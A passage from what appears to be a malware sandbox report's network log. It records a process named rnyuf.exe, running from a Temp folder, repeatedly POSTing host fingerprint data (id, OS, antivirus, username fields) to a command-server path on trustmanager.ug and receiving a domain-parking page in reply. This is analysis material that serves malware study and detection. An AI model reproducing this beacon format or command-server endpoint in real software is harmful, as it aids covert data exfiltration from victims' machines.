6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:01.252754927 CEST	15822	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
55	192.168.2.3	49781	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:01.394623995 CEST	15823	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:01.420753956 CEST	15824	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:01.420790911 CEST	15825	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
56	192.168.2.3	49782	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:01.568423033 CEST	15827	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:01.596807003 CEST	15828	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:01.596821070 CEST	15828	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
57	192.168.2.3	49783	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:01.742490053 CEST	15829	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:01.769962072 CEST	15831	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:01.769984007 CEST	15831	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
58	192.168.2.3	49784	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:01.911822081 CEST	15832	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:01.938365936 CEST	15834	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 